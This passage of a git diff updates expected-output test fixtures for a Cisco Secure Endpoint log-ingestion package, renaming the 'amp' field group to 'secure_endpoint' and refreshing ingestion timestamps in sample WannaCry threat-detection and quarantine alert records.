Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4380,7 +4384,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -4454,7 +4458,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111245976Z",
+                "ingested": "2021-09-27T00:41:58.139914132Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4465,7 +4469,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -4539,7 +4543,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111248029Z",
+                "ingested": "2021-09-27T00:41:58.139915864Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4550,7 +4554,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -4624,7 +4628,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111250102Z",
+                "ingested": "2021-09-27T00:41:58.139917583Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4635,7 +4639,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -4709,7 +4713,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111252179Z",
+                "ingested": "2021-09-27T00:41:58.139919309Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4720,7 +4724,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -4794,7 +4798,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111254243Z",
+                "ingested": "2021-09-27T00:41:58.139921054Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4805,7 +4809,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -4879,7 +4883,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111256297Z",
+                "ingested": "2021-09-27T00:41:58.139922777Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4890,7 +4894,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -4964,7 +4968,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111258359Z",
+                "ingested": "2021-09-27T00:41:58.139924479Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4975,7 +4979,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -5037,7 +5041,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111260412Z",
+                "ingested": "2021-09-27T00:41:58.139926207Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -5047,7 +5051,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json
index d7f77b936f5..a7288b0360c 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json
@@ -28,7 +28,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929459130Z",
+                "ingested": "2021-09-27T00:42:13.513653513Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -38,7 +38,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -103,7 +103,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929464236Z",
+                "ingested": "2021-09-27T00:42:13.513657497Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -113,7 +113,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -178,7 +178,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929466403Z",
+                "ingested": "2021-09-27T00:42:13.513659380Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -188,7 +188,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -253,7 +253,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929468348Z",
+                "ingested": "2021-09-27T00:42:13.513661186Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -263,7 +263,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -328,7 +328,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929470269Z",
+                "ingested": "2021-09-27T00:42:13.513662947Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -338,7 +338,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -403,7 +403,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929472180Z",
+                "ingested": "2021-09-27T00:42:13.513664682Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -413,7 +413,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -490,7 +490,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929474079Z",
+                "ingested": "2021-09-27T00:42:13.513666408Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat 